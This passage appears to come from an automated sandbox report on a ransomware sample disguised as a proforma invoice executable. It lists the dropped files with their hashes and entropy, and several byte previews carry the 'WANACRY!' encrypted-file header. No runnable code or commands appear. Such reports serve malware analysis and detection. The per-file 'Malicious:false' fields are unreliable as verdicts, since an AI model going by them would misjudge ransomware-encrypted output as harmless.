                                                          MD5:10639254F86E54A742C5D70140269FAA
                                                          SHA1:FA2E48766E43250DCC8D030FE9E2D7424087A759
                                                          SHA-256:AE79E37584FF86A9D1A01F70D76B03A897FB38D57F911757A4BF16C4883D5542
                                                          SHA-512:F08863AEA3A548EF42150ECCB9096CA6E4FFCB143F0BDAA5B410F9E5309F2E5E1ECF29D6195B7142BA990515D0CF8C230D68C59A8350033B2472B9D8607669B7
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.835256169210775
                                                          Encrypted:false
                                                          SSDEEP:24:wQtDzA+/3XXb5MEJpl/ULpFpqvWnLhFzOowu1iJwnbtTTUXVTRT:btDzR/3bDhUfhIkEwnGVTRT
                                                          MD5:ED11E13DDEC4CB23F44CE3A765606D70
                                                          SHA1:0A4837C6E9FFFC0D2AF9A54195F096BD60621D11
                                                          SHA-256:B5467290B6D406BA071F0933BEA85A236DFA1CC1634CCF7778BD3041CA2412F5
                                                          SHA-512:244AB579FFE769E7ACC12B8B799217F7C6AE9B1298F471E7B9DAE0391110B41B84269B42CCD7FA81BA08DDCBA9B43CFAB0BBFF3753E39A1F9F5F86A265F1FF4A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.781903416547841
                                                          Encrypted:false
                                                          SSDEEP:24:NJwF4RCj5CFxuZH/0DKgOIyN6QPjkjxq+hUka/BZ3wg4H5:s6aCFEx/0DKkydkjxJG5igO
                                                          MD5:138921DC4C06A0C0D51DE9C1E2D18DDD
                                                          SHA1:58F0ACCE36B48CB588BD58F8D8D6CEC44E44AA43
                                                          SHA-256:729533A90737FF489AA8202EF7261C09FA508976E8AFE50C664710B60401EDAC
                                                          SHA-512:D064454BFC605C39D78C1AD784EB4EE28C4399FF3B5443C7B4E571FC329ADAC87C350B09BB6D88311245E8735326651A6E71BA47D3A688D1B12976340012A4A0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:OpenPGP Secret Key
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.822260955936933
                                                          Encrypted:false
                                                          SSDEEP:24:HPGS449pt+NJyiboBS25pudmcNi4iXiokyDHcvfxh3Yxxv:v5Npt+2iboBS4Emcn9vfxhYx9
                                                          MD5:70FA554C53C2C424249803CB46D85B9B
                                                          SHA1:823E10932676820CBB1BE60ABCC49697DF810618
                                                          SHA-256:B9859F7E32BA78D82CA907ED5A2AA6AFB6E051D52E85FEBCF8561C8C091DA7DB
                                                          SHA-512:79CDBA0D506328AD62DE24231D4B035C73ADDEFDB1ED938FF7C1857B62738F42185565B1260E89C5755BB6F8ED674267BCC7562BD9157F8F1A09730CCA97A663
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.819830313222283
                                                          Encrypted:false
                                                          SSDEEP:24:hXrzChXy1JEa87SM3c3/MYTKXU5ND76NS3l9V+otGTA:ZzkyzEa8NA/MYT4UTDumlyNA
                                                          MD5:4C5F0273FCF4974C14CAA192D7A67DAB
                                                          SHA1:4DF71BE2A19322B1C89F83F96E99164BCC66B1F6
                                                          SHA-256:235DDAB663344AA6AB024E9BADB1F5C23FB1562CE68AFF0040BE8A59813AEE4A
                                                          SHA-512:3A74E06CB4CA1EA8FE08ECDCCB4FF64983993FD8C41288E15A73CC04136E74224443FC113035A6F6F73FAB1FA7C1B225CF40B2800495FB9A35E7F108A9230F62
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.80993583322359
                                                          Encrypted:false
                                                          SSDEEP:24:L++YW151wAaAbUd1XAXJmaKTDljSjzVo1H9vUgwTJcvuUGTdL:L+glwBaCsJcljRdBwTivuUGB
                                                          MD5:3D4CD4E842FC9F0B9C985F9DD1701FE4
                                                          SHA1:0631435AA989C2CA129261458CEB739098A1B4C0
                                                          SHA-256:ED8BF86F6F545E1DC0DBAA3D34C23395AAB8F02A83221FFAE0B5AD8D06D8AA40
                                                          SHA-512:60DB3B619EC5560F37F74EECCAFC54EE0E6A1B2BD0729409E5C375A5A7B53EF1A258BA1D59BE471133FEA40A9D11A079F612520173FD9B9F42DE06A47C84D59B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.826491100142259
                                                          Encrypted:false
                                                          SSDEEP:24:bk2USeWIh0idje3e5Dmsgl4AQH+SDKJHHpy6vGVihWWda2+aRnpoBmtvQSWY1Ra:bkFGIh0M6A6sq4/J6AEMmdCanpouQSW/
                                                          MD5:B11A35A00767CCC90AFC26CD656BE6A5
                                                          SHA1:3B0D540C77D1A7F27F31E331ED89B08A0FE05E2D
                                                          SHA-256:057D953C72C564BD3A6B221D1C19B3489FD5C5A4A5E834FA8117DD9742A79021
                                                          SHA-512:3FAEFE7E5E5CF58C1F4EEFE2DEE21192BF04C791F0289693FF5C9BA497CC02319156D0E79FAC090F4352D5921EF84CC89EF1C9FD37396165B4FF447778524A95
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....F..FKx.x.#u..#,z..........\.|DMi...1.sA."E..Z.]i..,...>......cC.@...d.6.N.f.L.....1.`...b...il=f.R.b...S.v96.'.b..ya..ENX...Q+..k.....Z..............fB..R....P...fu.9S.u.7.../..Rb..D&......;I.c......Go.......Jts..S....U.].f......+1.1..F...............!.F"....q.NPU.O...f#:.........R....,K.l..1"}).;.L_...~...I......A:r[\.}Z......c.y.QsD...L.W4C...j\O..d.j.3....h~.E.^..[;m.S.....Z\zK...W...,.(X.4s.*!..e.....K.I)..<....-..W.>.tScBl...]Me`....%....2k3.b.QE]J.SsI...}..b...8:"......u.....h*}.?_...}.2.A..t.T.v]l5Z=...w.y[.A.F...$r6H..\.&.="..@.Spl...2...D..N3......x..8..Dl.Yx....>:.eo..g...*l.D.>.N>D.n.7o...Py1wJ...._.|.q..Y..t.H...\..J..3~...Q...J.._...?;L.n.q.B.....A0n...h...L...Ix......C..K...'P..Z..!.6..[..x+..-W......S....N#..Si...kKFZ.T.."..q..3|._......G...B.:.....[.nV....8#...d.6A.].}...7.8&...l... .ho!...?...X.>.N.4j.KU.ay..R.w..]....F..J.U)}.@U&........6-....y.mMw~.7.R...ZB7)t......O...3.-:...~.~....^....br>.FT14h!?.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.84219440613889
                                                          Encrypted:false
                                                          SSDEEP:24:bkytDUrjC1RKa9dA9c3cCYg9inm1uLKP7KHc19c/WemiSwBAqSYD6jJkFMvAoug:bkyxoKdAyMCYg9im1V2h/WeegALYDpFw
                                                          MD5:2D13F311A049E0BAF38BF3D27F79CF46
                                                          SHA1:94B59990AF2E14FB38F4B31196F0463DD19B25FE
                                                          SHA-256:7D5BDB6CC0FD5E147A7DBA8A2569FCFCADD1A123B0895C7239A27F0A394BDD32
                                                          SHA-512:DE76B31AE2C55043DF9D9D2359E2A384504232EB6D7509B25B50EF5A158821E4BC98E127B0510C581B6F89EA41C4C6F12C08492492800F8D78BB296B193C02BB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!........l.".?.............9..2P.....jE=(....s....a.}p.......Z.u"q..J..><...n..;....].tD0..kb......fp....O...0....w36.J..\.... ..*..4..u..k)...X.....ko.....V...1.CQc}.f...v..<..V.....K.c3q.:.~e.c.p..._h.._;.P.g...B~/..q...o..B..<...`. Q...W................. ..".....S.dT*.y9..t...Ep..HM.....R..u..#..pd.-o.Y....`......x.Bk.+..O..E.r;...X.".xr...C.v.....0..7..........r..j........*6......A]3.1...:.......s.i.....Q.wz...-9U..O..h*..n.!E..I...k.%..l..r.|&r._.b...|G.....WY.|....x.9v...Q...9.-.#RB{B.^S...;..9..klK=....'.S..e.}..+R#.Lrz(.R`.h...++.l.vh...,.....I..3..O...b.Q..5..!!.......s..Aj....%..*.W.^1;.%%T..2.....e......6.Nf....N*..]...,4?.."..<.^......U.64/.......5?...;....wj...........JO.g..G.B...l5[+.../ ...4.A.?..o..M.p.v..v..O8w;....{.N.Hk.6.T..RQ....cL.H.~......B......k...+..u..$.w.............r....4.......o...e.rT....q..!.....{.o1T^.NS..N#.P...R1.."..|...z+.z-..#.D..,e..e.]6.P.)Lk'.....R..R....^.f........2jQ.y.mV......L|....pL`
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.834459685105275
                                                          Encrypted:false
                                                          SSDEEP:24:bkBDjmKtulazuSJk2m2ityW0op8KzbiSosgIWXk6wSAcmdBK3fZrWrGhGXlXOon9:bkVqALityWDp3viSjgX0fbcmdQvdWCh2
                                                          MD5:652472DDDF9854896C79BBECB3383DB9
                                                          SHA1:D688FAAFD665AC48E2BEEFA94748A72C29555A7F
                                                          SHA-256:CB1A15AB85EF29C92490D4F2E66D9FB6D2A8B68D67AA04E1171DB0160E095581
                                                          SHA-512:E22B0B4E691D648642C90B5DE3344FA7D85D3741ECA817C507E1904CCD09185A2BB44093558D3D5218763DBCEBB76A9E4ED8CFCBC467AF4D189FF6826F1AF6CB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....}...s...]h.B..x.n.;o^[.....C&u..3.!...>y(/..y(..rH...#..H..m`O...kG..]s.0.5)p.5.-...Z.....T.I}..Ml...........#hHK.09.o...#P......./5dd..j......."-.)......r.`_.Aa.....".4./..X.>S].{..`.k..../d....D.....Wa...=.)W]..B.v..^...~..!'.e.....H7.....J+^............VH.?7....<NE7.S.Y.{..!..N.B....Q.........k...../,j..r{.....U...XS...V.*.SqZl..P....>...>>..<......!...^..@cZ`.'!.;T!...i.......>To.6....F.%...[..../.....f....j.K..2..+'X....x........0z...(.uz..8<.........;...l..$.F...iSz/.Q.i.......D..l...."...w........S..z.....].d.Aj..m. ..@...Z)..$}......* .1.3.6.!>.Rp.Xf...j.%3....s.A..S.=.`.....~.......z.....I.R...@yN.)t2^.].2..]9.SniH....#.....i...C.*.F.l..2.....!OA...!........d/........J..-..`S.B.D{e..T1...v..o..u}..TFi.Mw..../...N..`.....7.P..c.j.\.Ba`TlG.VO.:!..<..!..I.....Z.%..dn.iqm.%.......<@.....Wy.........y..v-..,.`>..8...|A.3......R...8.O.]L.......OL./V|...>..'.37.%...#..6.3l.?nP[.>......X+...m)..4.........V.....h
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.854809754693924
                                                          Encrypted:false
                                                          SSDEEP:24:bkTlvRkhiBgoHGSAD+4blL+ZOg1wAyzjM7b6MnQPG6l9wcDMPwUD755YEESIw:bkRvYCHGSMlbNK8zjwbLQ5DMYk5YTSD
                                                          MD5:AF3EEB8465D52EA03FB84507C5647959
                                                          SHA1:E03A0515B5D983AADD73D855820ECD94161364E2
                                                          SHA-256:E9FA4C1C4730CF5404D5F2567E890E360D54D4409401E8DC797259D625F40EEF
                                                          SHA-512:06EF6C31E5E9F41DE859FD04E463D2DDBB6216A4ECCCE7917727C37ECBAC79255EA2C5092E2D20A2A23A72291DD75F0ACB443665EF2F71D82BF20C72416D4FF5
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....e....3..`)..vy1..g..^mis..y.I...I..p...!...a"].D...b.o.U.....).j.V..|..Ov.p...`B.N?....Sp....q...P.q...__.9...;w..8..H..... z.2K.7.....b.0i...p...7......v..n|g.....r....h..uB........t:U.e.~....M.Q..X.)........w&.....~`..._...".d...t)Br'....go..................ok...SG.E.L..-<=Fs6.....?....W.m.>2.3..E..P.'..M.:8...H....4T.5...!.]Y.-....]...s.;...0.Em.@.W.4......u.....(..>.._....Za....!_......6...g.D..O...ay$....1..CfI.t.]./.S........[..7_M%VjG#.G.nB.....L....<W..n7N.@..._.%......!...=m'.3.5.G.3v.}...{.Iu.E...K.M>*....)....w.9..of6.>.u....I...J......H.2J...;.2Qr=..BT`.+).B...o..i4yY.......g.../.\U.....|.+..:.u...{.8.M`U.^&]C....+.Q-.........x.Y...m..x..Hx.z2cH.?:.....!.j+..F...(.R.x...Fk._..#K...`U.m.x$......<_..&b...8j.Az..Q.E.!....Aj...Tg.o...s......%..iw...C.u.]..pc.Sn......E....y.W]jj.Y3.<Zh.-.iQ.XV.....,..C.....LI.,...!@...-"v.Ox.};e...o..Z.P.+....Kq.I.z.....I.q...#O"$..fF.R.S<....p...%.p.(..q3U....".....Z.)....e
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.826923063790363
                                                          Encrypted:false
                                                          SSDEEP:24:bk2is/33Sy1ZsuJ/xA9es5Muij/HbmaB3WTj/1A0y657FSKVi4PUG+dC:bk2is/3B/xA9E/7J3Wf/1pA9PM
                                                          MD5:1674AC271D331BED0D0A6A8A6AB8B889
                                                          SHA1:B5A0B1C067C56F4D3B960D56F3625F92568ECE46
                                                          SHA-256:43389140CBEBF32D0C197D684F5145394163231E9837F18F9162CC830C5D54A9
                                                          SHA-512:1FEE1944C20B9C38FE1D20410EFC03325E8AF11D3572BFDFCA317A135EDB5D578C24A710C9E39DBF1AD19781D90F8DC4840DDA378A98F5F0420916766BDF05DB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....$..x..hrM..M....IFQ....".<.{...3..V....x..%.T..6..ug..!...K^7..!.fh#.`8...&.4wm..l......^.n.M]j....z.i........f......}...(.9.K..'.'...?g./..... .,.x..$Pd....:..71k#._..k{......p.....ICG........fR!F...s.3|.4..'<{...msMoN..0...s...k ..J..7t..O.C............+.l..q...3..<...S..R.....I..2vv<.D....C..im.0.2.......P.<.d. bt.w1;y....H....+.@.I...Y..y....W.....=..<L.>r.>.r..D..0......<.....q#.m..SJ.P.OC...vWp`.....M.Fs>=*2..:.I..`".Bv..G......{..\..O..@tdf.v;.U.#.>~......BRk..O.........+......*.B\PSq..gH........l..k.r\....--1j..$_.2k...v.k.`7...=.+F)..+p..^1g.R..6.Z.b!+..r........9....`:.yv..D..!4......E.r.y..IA..+....M..{....2.$.x9*h.......P,...8Uof16.x|.................e1...D...K..g..).o..O.2x..(e.h.=.7a$h2L3...i.......O..1k.[..y..|.jjW..t....7s.....).2.GI....DT.(R.M.+.(...o..zi9{[6.[...hC-LO...."..6)..U....D,.7..el.....^(..<}..m.....].........(9.Q.*GC.....`op...5..D?.v1.i.5...T....TrA..)....$.k.s.H..M.R..U1....L...`..D..IO..@y...
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.835380095632516
                                                          Encrypted:false
                                                          SSDEEP:24:bkZTDME2p3Qxnh743SzoJnLjyfnUrVl5ImQ3JcxO9AbaNLTlYcZJN:bkZPMEQ3QL7WRBny8rVPzQ3+OWbc/2cB
                                                          MD5:919E1E078C4D3996B6A548820261DE8C
                                                          SHA1:66601A66AFC208001DCFCB663B1983F7FB5EDFC0
                                                          SHA-256:2FF936DA9F73E37635A9C49C846F689060F44F5B4A6D7733F85A002E06BB2013
                                                          SHA-512:A654E9D9B984B3E819E89A211A86B40AF7FB63E0CB18EC4ACC8EFDCBFFAEFC7D9FCFFCD7C5314AEDABA14375E0E1110E447A00E3A249913DC54EA4B4A28C0FA4
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....;~.t%_[e.."..rJ*..G.......Q...z..w.?v..n.!Oq....[...1..4.KX.c...)...-D.....D..L2.......@..^.^5.A..8...<9.v....<.....l/...[.R.HeFeG.......n#.+Yay.X..i..m....k.N.>t..J.<..c:......M...,Z./j......*^...B...4Pc.{...6......[A"..h.J....Ie.R...j...../!c(................xe.4..X.,......s=W!....^i.&.k.`.L\..\g.L%..?.2.oY.@.\G...l`..._.Q...#..+.CkB...5..j).M/3D....'..7z..G@2vl[J:.....}..@.X..t..L..5..,...q.,.!..F...&..z=.@.F./a......5h[.x&a..oO.[3{.....`...dF.:.{...r...\.?c...{....&`..x..K....z%.b5.V<.DjTj..!.C..hL....n7..e........\s....$.-E.i..i....1..0&.....0.E8...........96.A..".....1f......J.a..;{....u..:.d_0.......0.k.l.U.,|O.kOLK.#}.8.r.e....../.1..r.f.dI.V|..........BF Ca..A.q......u...:...P...B. t...8.oE..o.~....sd....Ll.C2n.&..e.....Aa.S..r...<.z...]........X..}..{.6..Kh..Y.M.}Jn.7.W....Fi.m..Y8M..l..O>_..PmD..=WSvo.gv.[............Oy.......+....M......q.I.Y..(?#...:....z)=..UpyM..Q1?..x..F..X.R.z.oA.-.C.[..o_.......n.......F+ .^Hk->\.[[
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.8111310662104865
                                                          Encrypted:false
                                                          SSDEEP:24:bkzXP2bbUHrphDDv7G1+a0HT2xkolty2zYwIi8NAUXfzJW0QbTFTovg0SRg:bkzXP2bmPy1+ajSSpzYwIi8HXfzJWLTO
                                                          MD5:5BC1B4CF5C4AF8C6742967A68A390146
                                                          SHA1:E64F9D68038974AE496019E8002975E926AD6A40
                                                          SHA-256:6AC8EF68CFB83C82419DC3E313914E4DFC6A81CC04D6A21CC4B81447D1C0A742
                                                          SHA-512:F701705103B8A289A93E879C373BEFB96B68EFDC7640C0CBD9B3F7E8BA744142321076CE3C7555AE46EC728235B0047C69AF0876F8A60B0801F84612D95E5D61
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......].....jK...(...i.;......R.:.y#.g......26..|.F..z.P3.LF.5.....L.G..U...8\.4...f............ ..ej&.....]'. }/.m...F...Ms.n.`........q.:..%Bh...R.gCMv<R(....p.&JD:la..e`........U.0lY#@....@.5s! ..r...32....x..u0.7-hMR.8_..C..h!..%.#8.8.]'$.1..;............l...$&@f....)Yr@.........<2..HEU....')....7K`...._....t..D.*>"J+.,6$....T7....U..gSg9.....-......Ab.Q....R....x..G]!fC..c.I...A.......;S...L..ea....X..2.b..`...!.$...,....R..7..u..cxu..e..\.q...).r...Kg.M.C%....q'..nyO..5.5.E..R..^.U8.L....G...;`....MP.iIn.{.2...!2...p...H.....p.\[sz...)Q.9.0|$.wP..n*.Q.Hy"...~.X<.A`.w. ....WQ.hzUD..v..u..Y8.i........I..p..o..:..w......u..O...X...L..T.!f.'...U.Q.L.b..K..F......$t..9...R..D..q.......^w7E.d. O.@.37.=9|{..q.jY3...L.8u...q...6mPJv...-...E...G.Y.2.....{a......."Z..q._..K?c...aI...Ox.Z..JK.u.>.wi&..*...+.5.[......P..kn..Go.|.:.?.GcMY...v{.8sfX.<....wx..S#..d.XJ.Y1`..]...G.#J`|.'.e`..I..n......p.E.....7......R.f.........6.O..&6I|.h0sP..
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.860375167409036
                                                          Encrypted:false
                                                          SSDEEP:24:bk0gZWMNEiaQtk9MvVtIOZPWDqhRSC4luejE+2u4HBEy5yOcuLTwHA:bkmMNL7CMvt4wRSC4xoEyIocHA
                                                          MD5:19E7838770B0EFA07C97532165312D40
                                                          SHA1:BE1BEBF4823853F3B8FB4FAF135303FB401C7C64
                                                          SHA-256:C84F06FA77379D9CAC7482388F6CBBF5A59674CA7C34853B13F45DF624FE16E7
                                                          SHA-512:0D2634CE003380501957DEBA0122952CAB5C2D476AD985B9C9BAB3214AACDDF240F605B40C9E8E3A2E244FEDB225BC65EDDD96AB947D6F58714F6099E2457C47
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.860375167409036
                                                          Encrypted:false
                                                          SSDEEP:24:bk0gZWMNEiaQtk9MvVtIOZPWDqhRSC4luejE+2u4HBEy5yOcuLTwHA:bkmMNL7CMvt4wRSC4xoEyIocHA
                                                          MD5:19E7838770B0EFA07C97532165312D40
                                                          SHA1:BE1BEBF4823853F3B8FB4FAF135303FB401C7C64
                                                          SHA-256:C84F06FA77379D9CAC7482388F6CBBF5A59674CA7C34853B13F45DF624FE16E7
                                                          SHA-512:0D2634CE003380501957DEBA0122952CAB5C2D476AD985B9C9BAB3214AACDDF240F605B40C9E8E3A2E244FEDB225BC65EDDD96AB947D6F58714F6099E2457C47
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.845741568766271
                                                          Encrypted:false
                                                          SSDEEP:24:bkuxQG28YZnmGpMfyhGKSxHypDPAR94z6GE5eaEPwIqSIeVu/PXtiPZ4E:bkZG28YZ3M2GKS1ypDPAR94z6b5O1qSx
                                                          MD5:0603AF8BA5579C3B4E71F592B2B4773C
                                                          SHA1:E9B3B04AB28C7F8F99A41AFC8A5821354607766A
                                                          SHA-256:5FC2E52A5E481D4A90A0DED431983B89B00F93D533DE25C8B1BF7766837527FA
                                                          SHA-512:985BEDD8522C5575D04E5B8614499AB57045F35AA4083A7DBF4D48D9C67FCC174119D231DEAB349198B3FB320DA32A9E562C72C5CBF3EBA0454D8D28AD19DB34
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.845741568766271
                                                          Encrypted:false
                                                          SSDEEP:24:bkuxQG28YZnmGpMfyhGKSxHypDPAR94z6GE5eaEPwIqSIeVu/PXtiPZ4E:bkZG28YZ3M2GKS1ypDPAR94z6b5O1qSx
                                                          MD5:0603AF8BA5579C3B4E71F592B2B4773C
                                                          SHA1:E9B3B04AB28C7F8F99A41AFC8A5821354607766A
                                                          SHA-256:5FC2E52A5E481D4A90A0DED431983B89B00F93D533DE25C8B1BF7766837527FA
                                                          SHA-512:985BEDD8522C5575D04E5B8614499AB57045F35AA4083A7DBF4D48D9C67FCC174119D231DEAB349198B3FB320DA32A9E562C72C5CBF3EBA0454D8D28AD19DB34
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.806749398683385
                                                          Encrypted:false
                                                          SSDEEP:24:bks20vyDBMudfPrMyeAsUOROm9DoT2d/e7hcXp+qfbmH0:bkN06lMw3rFvdOROmGT2W7efw0
                                                          MD5:A92303DBD124013BF38F0B54753E576C
                                                          SHA1:1E2101455F67B15AF6D74349257BB3851103A175
                                                          SHA-256:38F41EE7FD97A2593C2FC206BA97AF51E2F04CC200B83F90199CBEB04E890110
                                                          SHA-512:93490DA5B84747F07D0014F1E03A2A78C74AD1AFDA2E38A5574196DD67EB81247666A64E577666B5CDE772D5D24DC3F0BCFCFEDAEB3DABD7732B1AF8C714DE66
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.806749398683385
                                                          Encrypted:false
                                                          SSDEEP:24:bks20vyDBMudfPrMyeAsUOROm9DoT2d/e7hcXp+qfbmH0:bkN06lMw3rFvdOROmGT2W7efw0
                                                          MD5:A92303DBD124013BF38F0B54753E576C
                                                          SHA1:1E2101455F67B15AF6D74349257BB3851103A175
                                                          SHA-256:38F41EE7FD97A2593C2FC206BA97AF51E2F04CC200B83F90199CBEB04E890110
                                                          SHA-512:93490DA5B84747F07D0014F1E03A2A78C74AD1AFDA2E38A5574196DD67EB81247666A64E577666B5CDE772D5D24DC3F0BCFCFEDAEB3DABD7732B1AF8C714DE66
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.850152372547986
                                                          Encrypted:false
                                                          SSDEEP:24:bkUSO77xOcvJBjFDKLgi2Kyrl20mibod92JQCT5r46sUucUOPhkMNeZtBPOm9N8O:bkUSMvJBNKLx/Ylbi2JQCT+gjUOZteZP
                                                          MD5:AEEDD8D4453D4CD025A6F2F8904461CA
                                                          SHA1:D2BB29D043CDA83AD9FC831817F25918373A09DB
                                                          SHA-256:B55DDF77317EF0B67E8D798546F78D1995FB95D80580065E198002740DCEC567
                                                          SHA-512:0283AFD83CF9AFDBD800DCDCAE231C06B6452E4CA8058D61228381B3C58D1CA0486E0002BE1880446BC5FC3A9E83DE8D7B3CB7D461CAB9C06602843AC31DB9D6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.850152372547986
                                                          Encrypted:false
                                                          SSDEEP:24:bkUSO77xOcvJBjFDKLgi2Kyrl20mibod92JQCT5r46sUucUOPhkMNeZtBPOm9N8O:bkUSMvJBNKLx/Ylbi2JQCT+gjUOZteZP
                                                          MD5:AEEDD8D4453D4CD025A6F2F8904461CA
                                                          SHA1:D2BB29D043CDA83AD9FC831817F25918373A09DB
                                                          SHA-256:B55DDF77317EF0B67E8D798546F78D1995FB95D80580065E198002740DCEC567
                                                          SHA-512:0283AFD83CF9AFDBD800DCDCAE231C06B6452E4CA8058D61228381B3C58D1CA0486E0002BE1880446BC5FC3A9E83DE8D7B3CB7D461CAB9C06602843AC31DB9D6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.839837209114781
                                                          Encrypted:false
                                                          SSDEEP:24:bk29v4D4GzloMUqtN/MftQlSNcYvlgWpvr9FvbDq9DeYXLqMUAxwW8Tajcdu0v9z:bk2N4D4GzyatNkfIS/vlgWpvr9FDGUYW
                                                          MD5:74C7E38057688A78CFB7A788620FA3A6
                                                          SHA1:E829B6131735F224AE8E1412B12CB9B546E4F87C
                                                          SHA-256:5769DD9235CF9D9B5FF9C139CF1BABE309E85F5E6277D32F377DC449D97BDDFE
                                                          SHA-512:67891236EC3D45B5ADDC62E808EC15BA39E9E44DCEE0C733683CEA94F1B8814D683996A1AA9EE5047EFB6D5A19CF69FB0B1B6AAA5DEEC2BD088D094E32CCBAED
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.839837209114781
                                                          Encrypted:false
                                                          SSDEEP:24:bk29v4D4GzloMUqtN/MftQlSNcYvlgWpvr9FvbDq9DeYXLqMUAxwW8Tajcdu0v9z:bk2N4D4GzyatNkfIS/vlgWpvr9FDGUYW
                                                          MD5:74C7E38057688A78CFB7A788620FA3A6
                                                          SHA1:E829B6131735F224AE8E1412B12CB9B546E4F87C
                                                          SHA-256:5769DD9235CF9D9B5FF9C139CF1BABE309E85F5E6277D32F377DC449D97BDDFE
                                                          SHA-512:67891236EC3D45B5ADDC62E808EC15BA39E9E44DCEE0C733683CEA94F1B8814D683996A1AA9EE5047EFB6D5A19CF69FB0B1B6AAA5DEEC2BD088D094E32CCBAED
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.867830108387937
                                                          Encrypted:false
                                                          SSDEEP:24:bkQxqsOg/vNNQlb2RRlejdl/DVzBBLkw6L5A4rgm0Zqma3wAl2WvSLwJTGINxzs8:bkQwsPHQoRRleRl/DVl9x6Le4QjE2Xsb
                                                          MD5:B24E662910CE877831753BC556455CA3
